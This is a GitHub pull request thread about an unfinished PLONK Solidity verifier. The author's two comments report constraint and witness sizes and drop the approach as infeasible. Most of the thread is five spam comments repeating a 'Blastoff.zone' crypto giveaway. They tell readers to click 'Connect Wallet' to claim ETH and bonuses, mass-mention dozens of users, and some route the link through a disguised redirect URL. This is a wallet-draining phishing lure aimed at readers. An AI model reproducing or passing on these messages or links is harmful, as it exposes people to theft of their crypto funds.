### PR TITLE
towards plonk solidity verifier

### PR DESCRIPTION
**Pull request by lispc**
based on  https://github.com/succinctlabs/sp1/pull/522

### CODE REVIEW

**Comment by lispc** [comment]
207M    constraints.json
1.2M    witness.json

**Comment by lispc** [comment]
no feasiable now.. NbConstraints: 1245162636

**Comment by muralinori** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
hobofan, @W2Ning, @awmpy, @bitmaxnet, @dennis-gonzales, @yeshuibo, @njovy, @zfy0701, @ifvictr, @KenatSF, @awmanoj, @BunsDev, @laosan98, @huazhuangnan, @rodrigoherrerai, @shiyilee101, @L-Kov, @martaGonz, @k06a, @lukasz-golebiewski, @rolandsaven, @solean, @wangyifan, @yanis7774, @snd, @siko, @nnsdaos, @0x3bfc, @aashborn, @arzel, @RusseII, @motopig, @thai-cong-nguyen, @briansoule, @rafafrdz, @SwampSec, @mehmeta, @maximebrugel, @kazuakiishiguro, @Jaime-Iglesias, @etienne-napoleone, @ShivamArora, @dce99, @ccniuj, @ShayanJa, @getive, @robertu7, @jamiew1020, @gwalen-whitehatgaming, @ntrippar

**Comment by creer** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
jbshirk, @Mateusz123098, @jningtho, @JohannesTK, @Retia-Adolf, @Tubaleviao, @bryan-snyder, @mkorat1717, @ossa619, @anthonywittemann, @1an9ua9e, @skcks, @o-az, @DevonFulcher, @dgoodwin, @derek518, @BavariaBlue, @mngmntt, @discordianfish, @montogeek, @cooperinnovativeanalytics, @andriyor, @raman1383, @dantrevino, @bionicles, @crwood, @grizax, @stirch, @mmazurki, @ptsurbeleu, @khoa-nvk, @tayzlor, @ashleanichols, @lpan, @evansd, @bahelit, @Doppp, @richlittlehale, @colorblast, @erikvold, @Hiranyaloka, @yuya-fujimoto, @ceciliacsilva, @ggsonic, @harry4455, @Danieldevop, @mitar, @Aloha-Rick, @EG-easy, @SamSamskies

**Comment by avijit14** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
ger1964jou, @fsniper, @AMThie, @pims, @nursarowar, @dev-z, @awsation, @TenviLi, @DidierRLopes, @Zenmai0822, @exosr, @1783883121, @Makazzz, @Gingerbreadfork, @some-things, @omeyer99, @internet-director, @DrewTChrist, @str, @ellaann, @LightYourJourney, @harry-lloyd, @sashagra, @phantacix, @jamesaustin, @mrmign, @kaichaosun, @mydanniel, @onuruzun, @garrettmaring, @vadorovsky, @br3ant, @ariward, @rambazamba1337, @rtdaly, @e-corp-sam-sepiol, @YongbinBaek, @haunt98, @cruzanstx, @ATrnd, @b-o-b-b-y, @percojazz, @Robbankz, @yooyer, @mrnonz, @fattal28, @vcan, @tseyt, @pratham-bhatnagar, @asselinpaul

**Comment by ErichUanna** [comment]
[Banner](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!

To get started with the redirect templates in Nuclei, check out our [templates](https://app.blastofflzone.com/templates) now!
bitbaydev, @neichen, @ekpyrosis, @leelevi, @Tr0j4n9, @gopalindians, @iho, @brodock, @shinnc, @DanielGorlo, @sadr0b0t, @googya, @facexiang, @ungaro, @an-lee, @nursoltan-s, @alexisyellow, @zzov, @ibaderx7, @sg552, @charkala, @maleks, @antoninadert, @Psli, @ianeinser, @ongtao, @aferreira44, @exec-life, @Illimag, @spodone, @yespire, @jie17, @MalekMFS, @imWildCat, @ovalb, @ChandlerFerry, @h2park, @setoelkahfi, @alphantome, @ishamistygreen, @Teebo, @ortegacmanuel, @hakkisagdic, @genkin-he, @lucidddreams, @ysv, @fansyfs, @xpjack, @ph47s74x, @fxmozart

**Comment by 07Owuor** [comment]
[Banner](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
noncreativefolk, @yedy99, @shackra, @farisei77, @ivangabak, @Thaddeus19, @awalo666, @MrHou, @hua74ni, @0xChrisJL, @rursache, @soheil-bin, @artbin, @kern, @onesand, @RFARREY, @kenneth, @bradmatson, @r3d-b0y, @melyalex, @fabiojose, @SC-One, @Papadanny13, @ppyne, @ardalanamini, @Sean-Snow, @MayurKharbas, @artk42, @Fahhd1400, @xdf103, @Nihad86, @kannishk, @edgard116, @borymskyi, @SevenThrees, @kennethlaskoski, @vanishcode, @devxu, @yangblocker, @sajadsalamian, @gnuser, @Shellnco, @PeterCore, @ArchTaqi, @hoquenajimul, @susumu-nakoshi, @illdephyn3d, @b1ometric, @han0147, @ogty

**Review by Shellnco — APPROVED** [review]

**Pull request closed without merging**
